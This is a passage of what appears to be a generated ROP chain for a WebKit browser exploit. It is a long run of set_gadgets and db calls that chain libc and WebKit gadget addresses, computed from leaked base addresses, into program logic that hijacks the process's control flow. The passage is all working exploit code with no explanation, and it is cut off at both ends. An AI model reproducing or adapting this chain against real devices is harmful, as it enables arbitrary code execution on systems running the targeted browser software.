set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+206432, //L3490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+206464, //L3492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+206416, //L3489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3489: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3491: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3492: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi 
ropchain+206576, //L3493+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+206568, //L3493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3493: db([0, 0]); // 0x0 set_gadgets([ ropchain+206592, //L3493+24 ropchain+210392, //L3488 //L3494: libc_base+764760, //pop rsi ropchain+206632, //L3495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3495: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3497: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+206752, //L3500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+206736, //L3498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3498: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3500: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+206896, //L3503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+206864, //L3501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+206880, //L3502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3501: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3502: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3503: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+206976, //L3504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L3504: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3506: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+207096, //L3509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207080, //L3507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3507: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3509: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+207208, //L3510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207240, //L3512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207224, //L3511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3510: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3511: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3512: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+207360, //L3513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3513: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3515: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+207480, //L3518 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207464, //L3516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3516: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3518: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+207656, //L3521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207672, //L3522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+207624, //L3519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207640, //L3520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3519: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3520: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3521: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3522: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+207832, //L3526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+207800, //L3524 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+207816, //L3525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3523: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3524: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3525: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3526: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+207920, //L3527 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+207936, //L3528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3527: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3528: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+208112, //L3530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+208128, //L3531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208096, //L3529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3529: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3530: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3531: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+208240, //L3533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+208288, //L3536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+208256, //L3534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3533: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3534: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3535: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3536: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop 
rsi ropchain+208400, //L3537+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+208392, //L3537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3537: db([0, 0]); // 0x0 set_gadgets([ ropchain+208416, //L3537+24 ropchain+210360, //L3532 libc_base+764760, //pop rsi ropchain+208456, //L3538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3538: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3540: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+208576, //L3543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208560, //L3541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3541: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3543: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+208720, //L3546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208688, //L3544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+208704, //L3545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3544: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3546: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+208800, //L3547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 
//pop rcx ]); //L3547: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3549: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+208920, //L3552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+208904, //L3550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3550: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3552: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+209064, //L3555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209032, //L3553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+209048, //L3554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3553: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3554: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3555: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209152, //L3557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3556: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3557: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+209208, //L3558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3558: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3560: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi 
ropchain+209288, //L3562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3562: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209400, //L3563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3563: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3565: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+209520, //L3568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209504, //L3566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3566: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3568: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+209664, //L3571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+209632, //L3569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+209648, //L3570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3569: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3570: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3571: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+209744, //L3572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3572: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3573: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L3574: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+209872, //L3576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+209856, //L3575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3576: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+209952, //L3577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3577: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3579: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+210072, //L3582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+210056, //L3580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3580: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3582: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+210152, //L3584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+210184, //L3586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3584: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax 
//L3585: ropchain+210312, //L3583 libc_base+144605 //pop rdi ]); //L3586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+210288, //L3588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+210304, //L3587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3588: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3587: db([0, 0]); // 0x0 //L3583: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+210376, //L3589 //L3532: libc_base+782311, //pop rsp ropchain+210392, //L3590 //L3589: libc_base+782311, //pop rsp ropchain+206592, //L3494 //L3590: //L3488: libc_base+764760, //pop rsi ropchain+210432, //L3591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3593: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+210552, //L3596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+210536, //L3594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3594: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3596: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+210664, //L3597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210696, //L3599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+210680, //L3598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3597: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3599: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+210800, //L3600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210816, //L3601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3600: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3601: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+210936, //L3602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+210920, //L3603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3603: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3602: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+211024, //L3605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+211008, //L3604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3604: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3605: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+764760, //pop rsi ropchain+211128, //L3606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211144, //L3607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L3606: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3607: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+211264, //L3608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211248, //L3609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3609: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3608: db([0, 0]); // 0x0 //__ntoa_format: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+211336, //L3611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L3611: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+211432, //L3612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+211464, //L3615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L3612: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3614: db([96, 0]); // 0x60 set_gadget(webkit_base+568675,); //pop r8 //L3615: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+211568, //L3618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+211552, //L3616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3616: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3618: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+211744, //L3621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+211760, //L3622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+211712, //L3619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+211728, //L3620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3619: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3620: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3621: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3622: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+211856, //L3624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+211840, //L3623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3623: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3624: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3625: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3626: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L3627: 
db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+212056, //L3629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3629: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+212112, //L3630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3630: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+212248, //L3634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+212232, //L3633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3632: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3634: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+212368, //L3637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+212336, //L3635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3635: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3636: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3637: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+212504, //L3639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
